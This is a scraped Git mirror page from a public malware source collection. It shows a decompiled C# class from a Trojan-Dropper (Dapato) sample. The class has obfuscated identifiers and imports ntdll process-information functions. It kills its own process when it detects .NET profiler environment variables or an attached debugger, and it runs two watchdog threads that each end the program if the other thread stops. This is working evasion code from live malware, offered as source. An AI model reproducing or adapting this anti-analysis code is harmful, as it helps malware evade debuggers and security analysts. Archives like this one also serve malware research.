mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
78 lines
2.7 KiB
C#
78 lines
2.7 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: 倍鄻<E984BB>聍˵ꆬ
|
||
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
|
||
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
|
||
|
||
using System;
|
||
using System.Diagnostics;
|
||
using System.Runtime.InteropServices;
|
||
using System.Threading;
|
||
|
||
internal static class 倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ
|
||
{
|
||
[DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
||
private static extern int Ꮬꮼﮈ\uF1BE铰崘\uFFFD䉩(
|
||
IntPtr ProcessHandle,
|
||
int ProcessInformationClass,
|
||
byte[] ProcessInformation,
|
||
uint ProcessInformationLength,
|
||
out int ReturnLength);
|
||
|
||
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
||
private static extern uint \uF092됃戏잦ᰐ䣩㼑촓(
|
||
IntPtr ProcessHandle,
|
||
int ProcessInformationClass,
|
||
byte[] ProcessInformation,
|
||
uint ProcessInformationLength);
|
||
|
||
[DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
|
||
private static extern bool 䵕䞬遤\uA9FF亗\u2E54Ợ㝕(IntPtr hObject);
|
||
|
||
public static void 鈧렠\u1AF4鱛렪뜾㶘䄋()
|
||
{
|
||
switch (Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING"))
|
||
{
|
||
case null:
|
||
switch (Environment.GetEnvironmentVariable("COR_PROFILER"))
|
||
{
|
||
case null:
|
||
break;
|
||
default:
|
||
goto label_1;
|
||
}
|
||
break;
|
||
default:
|
||
label_1:
|
||
Environment.FailFast("Profiler detected");
|
||
break;
|
||
}
|
||
Thread parameter1 = new Thread(new ParameterizedThreadStart(倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ.ﱞꬕ興쉱㕷\uE4E0\u3371缣));
|
||
Thread parameter2 = new Thread(new ParameterizedThreadStart(倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ.ﱞꬕ興쉱㕷\uE4E0\u3371缣));
|
||
parameter1.IsBackground = true;
|
||
parameter2.IsBackground = true;
|
||
parameter1.Start((object) parameter2);
|
||
Thread.Sleep(500);
|
||
parameter2.Start((object) parameter1);
|
||
}
|
||
|
||
private static void ﱞꬕ興쉱㕷\uE4E0\u3371缣(object thread)
|
||
{
|
||
Thread.Sleep(1000);
|
||
Thread thread1 = (Thread) thread;
|
||
while (true)
|
||
{
|
||
if (Debugger.IsAttached || Debugger.IsLogging())
|
||
Environment.FailFast("Debugger detected (Managed)");
|
||
if (!thread1.IsAlive)
|
||
goto label_2;
|
||
label_1:
|
||
Thread.Sleep(1000);
|
||
continue;
|
||
label_2:
|
||
Environment.FailFast("Loop broken");
|
||
goto label_1;
|
||
}
|
||
}
|
||
}
|